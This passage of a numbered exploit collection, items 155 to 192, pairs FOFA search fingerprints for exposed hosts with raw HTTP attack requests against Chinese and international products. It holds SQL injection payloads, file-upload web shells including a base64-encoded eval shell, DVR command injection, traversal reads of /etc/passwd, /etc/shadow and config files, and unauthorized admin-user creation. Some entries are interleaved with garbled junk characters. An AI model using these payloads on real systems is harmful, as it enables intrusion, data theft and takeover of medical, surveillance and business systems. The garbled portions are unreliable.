Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

" u" F& z9 _9 V  a3 `159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 i9 X% B9 V4 ?$ c8 Y! LFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
- u6 b  l4 A3 C9 t& V4 X5 YPOST /webservices/WebJobUpload.asmx HTTP/1.1
- Z. r/ V$ L6 B. |; f4 q  E* `Host: x.x.x.x6 F5 U4 w' K6 X- D, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) R- w+ L- b( |. u4 ]
Content-Length: 1080
: H% y% d2 m! E4 o( ]3 WAccept-Encoding: gzip, deflate
- N0 y! n3 C( T5 \- |; |Connection: close
' r' `3 K9 E' T( _Content-Type: text/xml; charset=utf-82 S( _8 ^; b+ U! ^) j2 n4 d
Soapaction: "http://rainier/jobUpload"0 S0 q" O3 @) W8 H. ~6 f; z
- w& ^3 I& k" Z
<?xml version="1.0" encoding="utf-8"?>% G1 w0 I! Y" H& @0 l2 Y- |) Z4 w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' j* v6 {5 e) l4 a8 d
<soap:Body>
' ^3 m0 c- V5 ]" `6 Y6 G<jobUpload xmlns="http://rainier">: a2 `# @, P$ i* c
<vcode>1</vcode>9 X$ z9 b7 d+ k* l, f
<subFolder></subFolder>
! P# x4 p, S# R+ `<fileName>abcrce.asmx</fileName>
6 Q1 \0 E+ S+ r  w<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>0 @, C' N- x6 k+ N3 ^) z9 P
</jobUpload>
7 Q! o! A. R, W# O9 g! g) k# F0 B</soap:Body>
9 S$ W# D% N: K</soap:Envelope>/ x+ E+ E- d, K- J- ]
+ X$ t  E( a% g
9 ~/ C% g8 I2 X3 l0 V
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")7 v0 N8 T* W  v

+ Z4 m( B7 `  {: m' c$ e- Q7 R
160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: access the uploaded file
http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information release system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

/ x" D1 l" k3 t172. DT-高清车牌识别摄像机任意文件读取
5 G2 E5 b! `: V* ~. fFOFA:app="DT-高清车牌识别摄像机"7 @; A4 ]  d$ b4 K3 G* ^2 r8 s
GET /../../../../etc/passwd HTTP/1.18 ^" F- g+ I* E* r
Host: your-ip2 b" h1 R/ [' Y) v  _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 g* F0 b' p! Y# Z2 w2 I
Accept-Encoding: gzip, deflate+ m) L* @, y8 |% P# J  k8 Z& |" n( h
Accept: */*
$ y! }: g3 T# N8 V  g: aConnection: keep-alive
+ r- L2 b/ N! O6 s4 L% ]9 p  _7 K  X4 [0 ^9 i. O" Y

3 o. l+ c9 a2 H% V* y& W* o( O! Z3 B9 a- g
173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke CRM (帮管客 CRM) jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

# B2 _7 L" q2 {& M6 @7 X8 R187. Mura CMS processAsyncObject SQL注入
8 d- ~) }7 s  i" ]+ eCVE-2024-32640! j7 E1 j. r* j' x
FOFA:"Mura CMS"# I9 \' M( L8 i/ }# x& g, O/ Y7 Z* p
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (Lanwon clinical viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (ESAFENET electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (foreign trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

